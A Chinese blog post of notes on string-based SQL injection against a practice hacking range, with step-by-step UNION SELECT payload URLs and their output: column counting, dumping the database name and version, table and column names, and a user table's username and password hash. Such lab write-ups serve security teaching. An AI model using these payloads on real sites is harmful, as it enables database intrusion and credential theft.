字符型SQL注入笔记-男黑客靶场

字符型SQL注入笔记-男黑客靶场

男黑客靶场:http://www.nanhack.com

猜测列数

输入如下能得到结果
http://www.nanhack.com/payload/sql/char.php?id=-2' UNION SELECT 1,2,3,4,5,6,7,8--+
输入如下无法得到结果
http://www.nanhack.com/payload/sql/char.php?id=-2' UNION SELECT 1,2,3,4,5,6,7,8,9--+

得到列数为8

查找注入点位置

输入

http://www.nanhack.com/payload/sql/char.php?id=-2' UNION SELECT 1,2,3,4,5,6,7,8 --+

得到

select * from admins where id='-2' UNION SELECT 1,2,3,4,5,6,7,8 -- '
-----------------------------
用户名: 2
邮箱:4

找到注入点位置

爆数据库名和版本

输入

http://www.nanhack.com/payload/sql/char.php?id=-2' UNION SELECT 1,database(),3,version(),5,6,7,8--+

得到

select * from admins where id='-2' UNION SELECT 1,database(),3,version(),5,6,7,8-- '
-----------------------------
用户名: nanhack
邮箱:5.5.58

爆表名

输入

http://www.nanhack.com/payload/sql/char.php?id=-2' UNION SELECT 1,database(),3,group_concat(table_name),5,6,7,8 from information_schema.tables where table_schema=database()--+

得到

select * from admins where id='-2' UNION SELECT 1,database(),3,group_concat(table_name),5,6,7,8 from information_schema.tables where table_schema=database()-- '
-----------------------------
用户名: nanhack
邮箱:admin_logs,admins,class,facebook,kaiban,message,news,user

爆user表字段

输入

http://www.nanhack.com/payload/sql/char.php?id=-2' UNION SELECT 1,database(),3,group_concat(column_name),5,6,7,8 from information_schema.columns where table_schema=database() and table_name='user'--+

或者
http://www.nanhack.com/payload/sql/char.php?id=-2' UNION SELECT 1,database(),3,group_concat(column_name),5,6,7,8 from information_schema.columns where table_name='user'--+

得到

select * from admins where id='-2' UNION SELECT 1,database(),3,group_concat(column_name),5,6,7,8 from information_schema.columns where table_schema=database() and table_name='user'-- '
-----------------------------
用户名: nanhack
邮箱:id,username,password

爆user表数据

输入

http://www.nanhack.com/payload/sql/char.php?id=-2' UNION SELECT 1,database(),3,group_concat(username,'@',password),5,6,7,8 from nanhack.user--+

得到

select * from admins where id='-2' UNION SELECT 1,database(),3,group_concat(username,'@',password),5,6,7,8 from nanhack.user-- '
-----------------------------
用户名: nanhack
邮箱:admin@e10adc3949ba59abbe56e057f20f883e
posted @ 2021-03-13 13:06  codeace  阅读(137)  评论(0)    收藏  举报